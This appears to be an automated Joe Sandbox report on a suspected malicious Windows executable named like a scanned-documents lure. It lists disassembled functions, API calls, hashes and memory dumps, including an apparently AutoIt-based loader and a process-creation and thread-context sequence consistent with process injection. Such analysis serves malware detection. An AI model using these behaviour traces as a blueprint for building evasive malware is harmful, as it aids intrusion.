                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: IconLoadNotifyShell_String_wcslen
                                                      • String ID: Line:
                                                      • API String ID: 2289894680-1585850449
                                                      • Opcode ID: 074097080e3df8800061581881a6be2dc8f294cbb5f1cbdd172e8e966a16d1ae
                                                      • Instruction ID: 75fdf6ffac3a7cbd77384d56f80e733e9a19dae1994a6b67699122b4c4367e5b
                                                      • Opcode Fuzzy Hash: 074097080e3df8800061581881a6be2dc8f294cbb5f1cbdd172e8e966a16d1ae
                                                      • Instruction Fuzzy Hash: 2E31E47542A301AAD322FB10DC45FEBB7DCAB40B11F00495AF599930E1EF709669CBC2
                                                      Function 00282DE3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetOpenFileNameW.COMDLG32(?), ref: 002C2C8C
                                                        • Part of subcall function 00283AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00283A97,?,?,00282E7F,?,?,?,00000000), ref: 00283AC2
                                                        • Part of subcall function 00282DA5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00282DC4
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Name$Path$FileFullLongOpen
                                                      • String ID: X$`e4
                                                      • API String ID: 779396738-2432232201
                                                      • Opcode ID: 622baab5cd37a6d5b633f29f5659997fe62723994cb407aea1de40d1b92d5ade
                                                      • Instruction ID: fc6f3830e42abae94efb03ac9f3049ccaa3cd3311029e7718bff302de20c1fbd
                                                      • Opcode Fuzzy Hash: 622baab5cd37a6d5b633f29f5659997fe62723994cb407aea1de40d1b92d5ade
                                                      • Instruction Fuzzy Hash: BA21A875A202589FCF01EF94C845BDE7BFCAF49715F00405AE405BB281DBB45A5D8F61
                                                      Function 0029FDDB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 002A0668
                                                        • Part of subcall function 002A32A4: RaiseException.KERNEL32(?,?,?,002A068A,?,00351444,?,?,?,?,?,?,002A068A,00281129,00348738,00281129), ref: 002A3304
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 002A0685
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Exception@8Throw$ExceptionRaise
                                                      • String ID: Unknown exception
                                                      • API String ID: 3476068407-410509341
                                                      • Opcode ID: c6565bab13cf4ba660454e3abd202bc65f0fa8c2f7bdf6d6508bbcb655f12ca9
                                                      • Instruction ID: 9225419dbd0c3e1cda1ac375199ad4399304a2437e1ebe7efd176ee929f58534
                                                      • Opcode Fuzzy Hash: c6565bab13cf4ba660454e3abd202bc65f0fa8c2f7bdf6d6508bbcb655f12ca9
                                                      • Instruction Fuzzy Hash: FBF02234C2020EB7CF04FAA4D886C9E7B6C6E02344B604031F914C6492EF70EA35C9D0
                                                      Function 002F3017 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetTempPathW.KERNEL32(00000104,?,00000001), ref: 002F302F
                                                      • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 002F3044
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Temp$FileNamePath
                                                      • String ID: aut
                                                      • API String ID: 3285503233-3010740371
                                                      • Opcode ID: 66adcba29dec523dfddc010807b0e05053a391cb966c14ee7e02f9d870e65e49
                                                      • Instruction ID: bbffb2208fe58f3f02b2405ce106a62cde52c25c87241ca60a397dd8d94cc5ae
                                                      • Opcode Fuzzy Hash: 66adcba29dec523dfddc010807b0e05053a391cb966c14ee7e02f9d870e65e49
                                                      • Instruction Fuzzy Hash: 0AD05EB254032867DE20A7A4AC0EFCB3A6CDB09750F0006A1B655E6091DBF0A985CAD0
                                                      Function 00307F59 Relevance: 4.9, APIs: 3, Instructions: 430COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 003082F5
                                                      • TerminateProcess.KERNEL32(00000000), ref: 003082FC
                                                      • FreeLibrary.KERNEL32(?,?,?,?), ref: 003084DD
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Process$CurrentFreeLibraryTerminate
                                                      • String ID:
                                                      • API String ID: 146820519-0
                                                      • Opcode ID: b4b1d7021ed1f2eafc56abed7e7b86fbd4dad1899137c6134b9a38e49875e8b1
                                                      • Instruction ID: b65c13700cc7db05b6c1cb49ea57f48b41e43138f2bd2a00995fd02af004fff0
                                                      • Opcode Fuzzy Hash: b4b1d7021ed1f2eafc56abed7e7b86fbd4dad1899137c6134b9a38e49875e8b1
                                                      • Instruction Fuzzy Hash: 38128A75A093019FC715DF28C494B2ABBE5BF88318F15895DE8898B392CB31ED45CF92
                                                      Function 002810F3 Relevance: 4.7, APIs: 3, Instructions: 153comCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00281BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00281BF4
                                                        • Part of subcall function 00281BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 00281BFC
                                                        • Part of subcall function 00281BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00281C07
                                                        • Part of subcall function 00281BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00281C12
                                                        • Part of subcall function 00281BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 00281C1A
                                                        • Part of subcall function 00281BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 00281C22
                                                        • Part of subcall function 00281B4A: RegisterWindowMessageW.USER32(00000004,?,002812C4), ref: 00281BA2
                                                      • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0028136A
                                                      • OleInitialize.OLE32 ref: 00281388
                                                      • CloseHandle.KERNEL32(00000000,00000000), ref: 002C24AB
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                      • String ID:
                                                      • API String ID: 1986988660-0
                                                      • Opcode ID: ca8876c44c9ab15162ff9ed2fa679d78d209a53a946bc37c7fdc78040333251b
                                                      • Instruction ID: f38e0caae83b3b1547f631649eb0aafa7f291affab1231862ec63d88d91fda71
                                                      • Opcode Fuzzy Hash: ca8876c44c9ab15162ff9ed2fa679d78d209a53a946bc37c7fdc78040333251b
                                                      • Instruction Fuzzy Hash: A271C2B89213408FC797EF7AA9457953BECBB8A346B549A2AD40AC73B1FB304455CF40
                                                      Function 002B86AE Relevance: 4.6, APIs: 3, Instructions: 61COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • FindCloseChangeNotification.KERNELBASE(00000000,00000000,?,?,002B85CC,?,00348CC8,0000000C), ref: 002B8704
                                                      • GetLastError.KERNEL32(?,002B85CC,?,00348CC8,0000000C), ref: 002B870E
                                                      • __dosmaperr.LIBCMT ref: 002B8739
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: ChangeCloseErrorFindLastNotification__dosmaperr
                                                      • String ID:
                                                      • API String ID: 490808831-0
                                                      • Opcode ID: a61b33a8c8aed3bd69e9d37764c698a46c4e4d976b8f0bb4cd7f9804dbda27a6
                                                      • Instruction ID: b7318558e2921f59c3bdfa650b47a82f04c7f4ef3617f261a86682715a528093
                                                      • Opcode Fuzzy Hash: a61b33a8c8aed3bd69e9d37764c698a46c4e4d976b8f0bb4cd7f9804dbda27a6
                                                      • Instruction Fuzzy Hash: 25016B36A3433026D2A57634A8457FE678D4B827F8F380159F81C8F1D2DEA1CCD1C550
                                                      Function 002F2FD8 Relevance: 4.5, APIs: 3, Instructions: 27filetimeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,00000000,?,?,002F2CD4,?,?,?,00000004,00000001), ref: 002F2FF2
                                                      • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,002F2CD4,?,?,?,00000004,00000001,?,?,00000004,00000001), ref: 002F3006
                                                      • CloseHandle.KERNEL32(00000000,?,002F2CD4,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 002F300D
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: File$CloseCreateHandleTime
                                                      • String ID:
                                                      • API String ID: 3397143404-0
                                                      • Opcode ID: a4a32f2faa90ca94a8274ffe52d2118ccf21038f1c851419967fad739c9e3806
                                                      • Instruction ID: 0d0b3e2495dce539b85bc67c7ff554b913dd1dbbe6a0d9c1d86029d76dcb2deb
                                                      • Opcode Fuzzy Hash: a4a32f2faa90ca94a8274ffe52d2118ccf21038f1c851419967fad739c9e3806
                                                      • Instruction Fuzzy Hash: BBE086362D022477E2312755BC0DFDB3A1CD78AB71F108224F729750D186A0160142A8
                                                      Function 00291310 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 531COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • __Init_thread_footer.LIBCMT ref: 002917F6
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Init_thread_footer
                                                      • String ID: CALL
                                                      • API String ID: 1385522511-4196123274
                                                      • Opcode ID: 5828ea9df8f9469507f2c4d7932644b0495daa8bb581345b99c4231add23fab3
                                                      • Instruction ID: e2fad1959f56b11bbaf7a7686a852c4171b7b095e98669f9450e83d38e205e3d
                                                      • Opcode Fuzzy Hash: 5828ea9df8f9469507f2c4d7932644b0495daa8bb581345b99c4231add23fab3
                                                      • Instruction Fuzzy Hash: C3229A746282029FDB14DF15C484A2ABBF1BF89304F24896DF4968B3A1D771EC61CF92
                                                      Function 002F6EF1 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 297COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • _wcslen.LIBCMT ref: 002F6F6B
                                                        • Part of subcall function 00284ECB: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00351418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00284EFD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: LibraryLoad_wcslen
                                                      • String ID: >>>AUTOIT SCRIPT<<<
                                                      • API String ID: 3312870042-2806939583
                                                      • Opcode ID: a250731e4ea720a19e0404872e6a77fa30ab1ab7a493b60175c5f13ab1ec3006
                                                      • Instruction ID: 859841ad4a3e8b0093fc6c78a184346cca40ea4eee242dbc370cdbeca4988ea4
                                                      • Opcode Fuzzy Hash: a250731e4ea720a19e0404872e6a77fa30ab1ab7a493b60175c5f13ab1ec3006
                                                      • Instruction Fuzzy Hash: AFB18E341292068FDB14FF20C49196AB3E5AF94340F14496DF996972A2EF30ED58CF92
                                                      Function 002F2557 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 50COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: __fread_nolock
                                                      • String ID: EA06
                                                      • API String ID: 2638373210-3962188686
                                                      • Opcode ID: 846bb1d88b9c8073a31411096debd8cc5162a5bfcbe5dc197b732788715b01d9
                                                      • Instruction ID: 249130797ab849efab2eef3f178f255bb0804a9dea55665ac5bc599c05900052
                                                      • Opcode Fuzzy Hash: 846bb1d88b9c8073a31411096debd8cc5162a5bfcbe5dc197b732788715b01d9
                                                      • Instruction Fuzzy Hash: F801B9719142587EDF18C7A8C856EFEBBF8DB06301F00455AE152D6181E5B4E6188B60
                                                      Function 00283837 Relevance: 3.1, APIs: 2, Instructions: 77windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00283908
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: IconNotifyShell_
                                                      • String ID:
                                                      • API String ID: 1144537725-0
                                                      • Opcode ID: 1ff76048311bfb270d2930e2b7f2c30f4fd75ea1d759c8a32fbbb7da4efe948b
                                                      • Instruction ID: 955e4e00d577b233cefd42dc1555ef01f40fea66de1b75e9881c4b9012e10d66
                                                      • Opcode Fuzzy Hash: 1ff76048311bfb270d2930e2b7f2c30f4fd75ea1d759c8a32fbbb7da4efe948b
                                                      • Instruction Fuzzy Hash: 0431B474615301DFD721EF24D894797BBE8FB49709F00092EF99983290E7B1AA54CB92
                                                      Function 0320129D Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateProcessW.KERNELBASE(?,00000000), ref: 03201A5B
                                                      • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 03201AF1
                                                      • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 03201B13
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1659326696.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_3200000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                      • String ID:
                                                      • API String ID: 2438371351-0
                                                      • Opcode ID: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
                                                      • Instruction ID: 7070874eb9c62e0b16af1948eaf78a74c006dcac53b26e1c7ce2a9761a271e12
                                                      • Opcode Fuzzy Hash: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
                                                      • Instruction Fuzzy Hash: D412FD24E24658C6EB24CF60D8507DEB232EF68300F1090E9910DEB7A5E77A4F85CF5A
                                                      Function 00289E90 Relevance: 1.8, APIs: 1, Instructions: 342COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 119dba759942f052cb3ed2f1d5bd69f08e401c9fb4144b679f1797b5d97f30c7
                                                      • Instruction ID: f3d8ff22c309c0183a23207c27cc0101a8d558613cce05bcf8314d1fd7799c1f
                                                      • Opcode Fuzzy Hash: 119dba759942f052cb3ed2f1d5bd69f08e401c9fb4144b679f1797b5d97f30c7
                                                      • Instruction Fuzzy Hash: 17C1C179D2120A9BEF14FF98C440AFEB3B5EF14310F548127E912A71D1DB7499A2CB52
                                                      Function 00284ECB Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00284E90: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00284EDD,?,00351418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00284E9C
                                                        • Part of subcall function 00284E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00284EAE
                                                        • Part of subcall function 00284E90: FreeLibrary.KERNEL32(00000000,?,?,00284EDD,?,00351418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00284EC0
                                                      • LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00351418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00284EFD
                                                        • Part of subcall function 00284E59: LoadLibraryA.KERNEL32(kernel32.dll,?,?,002C3CDE,?,00351418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00284E62
                                                        • Part of subcall function 00284E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00284E74
                                                        • Part of subcall function 00284E59: FreeLibrary.KERNEL32(00000000,?,?,002C3CDE,?,00351418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00284E87
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Library$Load$AddressFreeProc
                                                      • String ID:
                                                      • API String ID: 2632591731-0
                                                      • Opcode ID: 9d6ab1dea30c4408a7e0ad72f0e9d20deba82b9da0f323775c5476239c039fbb
                                                      • Instruction ID: 0fa0f00a86fb3fae5b3d58aafb3fed8dc62d266a82503d489d77d5abf12d7680
                                                      • Opcode Fuzzy Hash: 9d6ab1dea30c4408a7e0ad72f0e9d20deba82b9da0f323775c5476239c039fbb
                                                      • Instruction Fuzzy Hash: 55112336631206ABCF14FF60DC02FAD77A5AF54714F20882EF242A61C1EEB49A259F50
                                                      Function 002B8402 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: __wsopen_s
                                                      • String ID:
                                                      • API String ID: 3347428461-0
                                                      • Opcode ID: 8eb45ac5709d2291f4ba422f4cb01e15ffed6e6c55b0f199c10816dbe8166cb4
                                                      • Instruction ID: 5bfe6f1e77be53b0d536f438a2ed14c985f7b88d1e1cc3aa804fb40e327debcb
                                                      • Opcode Fuzzy Hash: 8eb45ac5709d2291f4ba422f4cb01e15ffed6e6c55b0f199c10816dbe8166cb4
                                                      • Instruction Fuzzy Hash: BA11187591420AAFCF05DF58E941ADA7BF9EF48314F104159FC08AB312DA31EA21CBA5
                                                      Function 002B5000 Relevance: 1.6, APIs: 1, Instructions: 52COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 002B4C7D: RtlAllocateHeap.NTDLL(00000008,00281129,00000000,?,002B2E29,00000001,00000364,?,?,?,002AF2DE,002B3863,00351444,?,0029FDF5,?), ref: 002B4CBE
                                                      • _free.LIBCMT ref: 002B506C
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
